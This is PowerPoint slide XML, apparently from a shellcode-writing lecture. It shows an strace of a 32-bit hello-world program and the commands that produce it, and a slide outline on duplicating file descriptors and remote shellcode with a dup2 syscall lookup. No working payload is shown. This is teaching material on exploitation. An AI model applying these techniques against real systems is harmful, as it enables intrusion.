              </a:rPr>
              <a:t>(0)                                  = 0x804a000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>open("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ld.so.preload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", O_RDONLY)    = -1 ENOENT (No such file or directory)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>open("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ld.so.cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", O_RDONLY)      = 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fstat64(3, {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=S_IFREG|0644, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=91048, ...}) = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>old_mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(NULL, 91048, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40014000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>close(3)                                = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>open("/lib/i686/libc.so.6", O_RDONLY)   = 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0Pv\1B4\0"..., 1024) = 1024</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fstat64(3, {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=S_IFREG|0755, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=1402035, ...}) = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>old_mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0x42000000, 1264960, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x42000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mprotect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0x4212c000, 36160, PROT_NONE)  = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>old_mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0x4212c000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x12c000) = 0x4212c000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>old_mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0x42131000, 15680, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x42131000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>close(3)                                = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>munmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0x40014000, 91048)               = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0)                                  = 0x804a000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0x804a030)                          = 0x804a030</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0x804b000)                          = 0x804b000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fstat64(1, {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st_mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=S_IFCHR|0620, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>st_rdev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>makedev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(136, 4), ...}) = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40014000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>write(1, "Hello world!\n", 13Hello world!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)          = 13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>munmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0x40014000, 4096)                = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_exit(0)                                = ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149511" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="4711338"/>
            <a:ext cx="7467600" cy="1844095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obtain with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>following commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –m32 –o hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hello.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>trace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ./hello</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Produces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>output on the right</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="316359" y="3810000"/>
            <a:ext cx="4213222" cy="1554733"/>
            <a:chOff x="228601" y="3896494"/>
            <a:chExt cx="4213222" cy="1554733"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149513" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3856036" y="4311626"/>
              <a:ext cx="585787" cy="1139601"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle" w="lg" len="med"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="45720" rIns="45720" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149514" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228601" y="3896494"/>
              <a:ext cx="3627436" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="19050">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="45720" rIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>System call we are interested in: “</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>write</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42048069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9510"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1495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9509"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14950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9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9" grpId="0"/>
      <p:bldP spid="149510" grpId="0" animBg="1"/>
      <p:bldP spid="1495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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>duplicating file descriptors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="7704856" cy="2836674"/>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050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reader@hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>booksrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> dup2 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/include/asm-i386/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define __NR_dup2                63</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reader@hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>booksrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $ man 2 dup2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
